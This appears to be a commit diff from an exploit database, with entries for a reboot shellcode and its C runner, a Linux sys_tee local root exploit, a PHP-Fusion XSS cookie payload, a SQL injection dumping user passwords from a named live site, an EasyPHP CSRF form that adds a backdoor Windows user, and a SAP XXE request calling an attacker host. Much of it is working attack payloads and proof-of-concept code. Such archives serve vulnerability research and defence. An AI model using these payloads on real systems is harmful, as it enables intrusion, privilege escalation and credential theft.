804906b: 88 46 11 mov %al,0x11(%esi)
804906e: 89 76 12 mov %esi,0x12(%esi)
8049071: 8d 5e 08 lea 0x8(%esi),%ebx
8049074: 89 5e 16 mov %ebx,0x16(%esi)
8049077: 8d 5e 0b lea 0xb(%esi),%ebx
804907a: 89 5e 1a mov %ebx,0x1a(%esi)
804907d: 89 46 1e mov %eax,0x1e(%esi)
8049080: b0 0b mov $0xb,%al
8049082: 89 f3 mov %esi,%ebx
8049084: 8d 4e 12 lea 0x12(%esi),%ecx
8049087: 8d 56 1e lea 0x1e(%esi),%edx
804908a: cd 80 int $0x80
804908c: b0 01 mov $0x1,%al
804908e: 31 db xor %ebx,%ebx
8049090: cd 80 int $0x80
08049092 <mycall>:
8049092: e8 cb ff ff ff call 8049062 <shellcode>
8049097: 2f das
8049098: 62 69 6e bound %ebp,0x6e(%ecx)
804909b: 2f das
804909c: 73 68 jae 8049106 <_end+0x4a>
804909e: 23 2d 63 23 72 65 and 0x65722363,%ebp
80490a4: 62 6f 6f bound %ebp,0x6f(%edi)
80490a7: 74 23 je 80490cc <_end+0x10>
80490a9: 41 inc %ecx
80490aa: 41 inc %ecx
80490ab: 41 inc %ecx
80490ac: 41 inc %ecx
80490ad: 42 inc %edx
80490ae: 42 inc %edx
80490af: 42 inc %edx
80490b0: 42 inc %edx
80490b1: 43 inc %ebx
80490b2: 43 inc %ebx
80490b3: 43 inc %ebx
80490b4: 43 inc %ebx
80490b5: 44 inc %esp
80490b6: 44 inc %esp
80490b7: 44 inc %esp
80490b8: 44 inc %esp
------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\xeb\x30\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x11\x89\x76\x12\x8d\x5e\x08\x89\x5e\x16\x8d\x5e\x0b\x89\x5e\x1a\x89\x46\x1e\xb0\x0b\x89\xf3\x8d\x4e\x12\x8d\x56\x1e\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xcb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23\x72\x65\x62\x6f\x6f\x74\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44";
void main(){
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

26
platforms/linux/local/29714.txt
View file

@ -4,4 +4,30 @@ The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue allows local attackers to gain superuser privileges, facilitating the complete compromise of affected computers.
Linux 2.6.16 -> 2.6.17.6 local root exploit in sys_tee()
------------------------------------------------------------
*proof that null ptr dereference bugs can be exploited*
------------------------------------------------------------
Bug in fs/splice.c was silently fixed in 2.6.17.7, even though
the SuSE developer who fixed the bug knew it to be a "local DoS"
Changelog stated only: "splice: fix problems with sys_tee()"
On LKML, the user reporting tee() problems said the oops
was at ibuf->ops->get(ipipe, ibuf), where ibuf->ops was NULL
Exploitation is trivial, mmap buffer at address 0, 7th dword
is used as a function pointer by the kernel (the get())
------------------------------------------------------------
May need to run multiple times to catch race.
Exploit does chmod u+s on /bin/bash and disables all LSM modules,
including SELinux.
Code involved with disable_selinux() in tee42-24tee.c should be independent
enough to be plugged into any kernel exploit where you have arbitrary
code execution.
Remember to use /bin/bash -p when executing rootshell
This exploit is *NOT* stealthy. You'll have to do some serious work
to exploit this bug silently.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29714.tgz

7
platforms/php/webapps/35558.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/47130/info
PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[Path]/articles.php?article_id="><script>alert(document.cookie);</script>

9
platforms/php/webapps/40804.txt
View file

@ -114,13 +114,6 @@ oshingler
Not existing
--
Ivan Todorov | Иван Тодоров
TAD GROUP | ТАД ГРУП
CEO | Изпълнителен Директор
www.tad.bg | +359 877 123456
Самоков 28А, офис 6.2 | 1000 София | България
Samokov 28А, office 6.2 | 1000 Sofia | Bulgaria

184
platforms/php/webapps/40809.txt Executable file
View file

@ -0,0 +1,184 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/EASYPHP-DEV-SERVER-REMOTE-CMD-EXECUTION.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.easyphp.org
Product:
=============================
EasyPHP Devserver v16.1.1
easyphp-devserver-16.1.1-setup.exe
hash: 64184d330a34be9e6c029ffa63c903de
A complete WAMP environment for PHP development & personal web hosting.
Host with Webserver PHP, Apache, MySQL, Nginx, PhpMyAdmin,
Xdebug, PostgreSQL, MongoDB, Python, Ruby...for Windows.
Vulnerability Type:
=================================
CSRF / Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
EasyPHP Devserver dashboard runs on port 1111, the PHP code contains
mulitple RCE vectors, which can allow
arbitrary OS commands to be executed on the target system by remote
attackers, if a user visits malicious webpage or link.
The "index.php" and "explorer.php" files both contain vulnerable code that
will happily process both GET / POST RCE requests.
Below EasyPHP Code contains no CSRF token or checks whatsoever. All
attacker needs is to supply 'type' and command values.
Possibility for RFI (remote file inclusion) if the "allow_url_include=0"
setting is changed in "php.ini" configuration.
No checks or CSRF tokens for PHP include directives either, the default
however is set to Off.
e.g. RFI attempt result
Warning: include(): http:// wrapper is disabled in the server configuration
by allow_url_include=0
line 8 of "explorer.php"
======================
//== ACTIONS
==================================================================
if (isset($_POST['action'])) {
// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}
//////////////////////////////////////////////////
line 48 "index.php"
==================
//== ACTIONS
==================================================================
if (isset($_POST['action'])) {
// Include and exec
if (isset($_POST['action']['request'])) {
foreach ($_POST['action']['request'] as $request) {
if ($request['type'] == 'include') include(urldecode($request['value']));
if ($request['type'] == 'exe') exec(urldecode($request['value']));
}
}
sleep(1);
$redirect = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
header("Location: " . $redirect);
exit;
}
if (isset($_GET['action'])) {
// Include and exec
if ($_GET['action'] == 'include') include(urldecode($_GET['value']));
if ($_GET['action'] == 'exe') exec(urldecode($_GET['value']));
if (isset($_GET['redirect'])) {
$redirect = urldecode($_GET['redirect']);
} else {
$redirect = 'http://127.0.0.1:1111/index.php';
}
sleep(1);
header("Location: " . $redirect);
exit;
}
Exploit code(s):
===============
1) Add Backdoor User Account
<form action="http://127.0.0.1:1111/explorer.php" method="post">
<input type="hidden" name="action[request][0][type]" value="exe">
<input type="hidden" name="action[request][0][value]" value="net user EVIL
Password /add">
<script>document.forms[0].submit()</script>
</form>
2) Run "calc.exe"
<a href="http://127.0.0.1:1111/index.php?action=exe&value=calc.exe
">Clicky...</a>
Disclosure Timeline:
======================================
Vendor Notification: No replies
November 22, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx

7
platforms/php/webapps/6684.txt
View file

@ -18,13 +18,6 @@ greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group-=
http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
--------------------------------
[+] liveDEMO:
http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--
============================
+Proud 2 be Albanian

43
platforms/windows/dos/40815.html Executable file
View file

@ -0,0 +1,43 @@
<!--
Source: http://blog.skylined.nl/20161121001.html
Synopsis
A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::Ls­Find­Span­Visual­Boundaries method (or other methods called by it) to access arbitrary memory.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
Description
The memory corruption causes the Ptls5::Ls­Find­Span­Visual­Boundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.
Repro.html
-->
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<button>
<pre>
<x>
<sub>
<ruby>
<img height="1"/>
</ruby>
</sub>
</x>
</pre>
</button>
</body>
</html>
<!--
Time-line
July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->

77
platforms/windows/local/40807.txt Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Unquoted Service Path Vulnerability in Huawei UTPS Software
# Date: Nov 16 2016
# Author: Dhruv Shah (@Snypter)
# Website: http://security-geek.in
# Contact: dhruv-shah@live.com
# Category: local
# Vendor Homepage: http://www.huawei.com/
# Version: Versions earlier than UTPS-V200R003B015D16SPC00C983
# Tested on: Windows XP , Windows 7-10 x86/x64
# CVE: CVE-2016-8769
1. Description
Huawei UTPS Software is the core software that is bundled with the
Internet Dongles, it provides it dongles to companies like Airtel ,
TATA Photon . This is the software that installs itself for the Dongle
to run on the attached machine. It installs as a service ("Photon.
RunOUC") and ("Airtel. RunOuc") with an unquoted service path running
with SYSTEM privileges.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system.
2. Proof of Concept
( TATA PHOTON Dongles)
C:\Documents and Settings\Dhruv>sc qc "Photon. RunOuc"
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: Photon. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program
Files\Photon\Huawei\EC306-1\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Photon. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
( Airtel Dongles)
C:\Documents and Settings\Dhruv>sc qc "airtel. Runouc"
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: airtel. Runouc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\airtel\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : airtel. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local attacker must insert an
executable file
in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
Additional notes :
Fixed in version UTPS-V200R003B015D16SPC00C983
CVSSv3 Risk Rating
Base Score: 6.4 (AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H )
Temporal Score: 5.9 (E:F/RL:O/RC:C)
Vulnerability Disclosure Timeline:
=========================
06/09/2016 - Contact With Vendor
06/09/2016 - Vendor Response
15/11/2016 - Release Fixed Version

117
platforms/xml/webapps/40816.txt Executable file
View file

@ -0,0 +1,117 @@
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.5
Vendor URL: SAP
Bugs: XXE
Reported: 09.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 09.08.2016
Reference: SAP Security Note 2296909
Author: Vahagn Vardanyan (ERPScan)
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-034] SAP NetWeaver AS JAVA XXE vulnerability in BC-BMT-BPM-DSK component
Advisory ID:[ERPSCAN-16-034]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/
Date published: 11.11.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 6.4 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) Low (L)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
1) It is possible, that an attacker can perform a DoS attack (for example, an XML Entity expansion attack)
2) An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker forwards the authentication information both ways, giving him access.
4. VULNERABLE PACKAGES
BPEM PORTAL CONTENT 7.20
BPEM PORTAL CONTENT 7.30
BPEM PORTAL CONTENT 7.31
BPEM PORTAL CONTENT 7.40
BPEM PORTAL CONTENT 7.50
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2296909
6. AUTHOR
Vahagn Vardanyan (ERPScan)
7. TECHNICAL DESCRIPTION
PoC
POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
Content-Type: text/xml
User-Agent: ERPscan
Host: SAP_IP:SAP_PORT
Content-Length: 480
Connection: Keep-Alive
Cache-Control: no-cache
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>
&xxe;</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
8. REPORT TIMELINE
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 09.08.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/